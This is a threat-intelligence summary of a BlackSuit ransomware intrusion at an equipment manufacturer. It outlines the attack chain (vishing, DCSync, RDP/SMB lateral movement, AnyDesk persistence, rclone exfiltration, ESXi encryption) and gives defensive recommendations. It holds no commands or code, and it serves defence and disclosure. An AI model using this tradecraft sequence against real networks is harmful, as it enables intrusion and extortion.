Anatomy of an Attack: The BlackSuit Blitz at a Global Equipment Manufacturer
Category:Threat Alerts / Malware & Ransomware
Unit 42 documents a BlackSuit ransomware intrusion operated by Ignoble Scorpius. Initial access via vishing-led credential theft enabled VPN login, followed by DCSync to steal privileged creds, lateral movement via RDP/SMB with tools like Advanced IP Scanner/SMBExec, persistence via AnyDesk and a custom RAT as scheduled tasks, and mass encryption across ~60 ESXi hosts orchestrated through Ansible. Exfiltration used a renamed rclone binary; cover-up included CCleaner. The response scaled Cortex XDR from 250 to 17,000 endpoints, negated a $20M ransom, and transitioned to MDR. The case underscores the speed of identity-centric ransomware and the importance of privileged identity controls, EDR ubiquity, and hypervisor protections.
CORTEX Protocol Intelligence Assessment
{"Business Impact":"Enterprise-wide disruption, potential IP/data loss, and high extortion pressure.","Technical Context":"Credential theft (vishing→VPN), DCSync, AnyDesk persistence, rclone exfil, ESXi-wide encryption via Ansible."}
Strategic Intelligence Guidance
- Mandate phishing-resistant MFA for remote access; block legacy auth; monitor helpdesk social engineering.
- Protect AD: constrain DC access, disable NTLM, enforce EPA, detect DCSync/ESRP RPC abuse.
- Harden hypervisors and segment management networks; monitor for rclone and mass encryption behaviors.
- Ensure EDR coverage on all endpoints/servers; drill incident response including ransom negotiation playbooks.
Vendors
Threats
Targets
Impact
Data Volume:400GB exfil (approx)
Financial:$20M ransom demanded
Intelligence Source: Anatomy of an Attack: The "BlackSuit Blitz" at a Global Equipment Manufacturer | Oct 15, 2025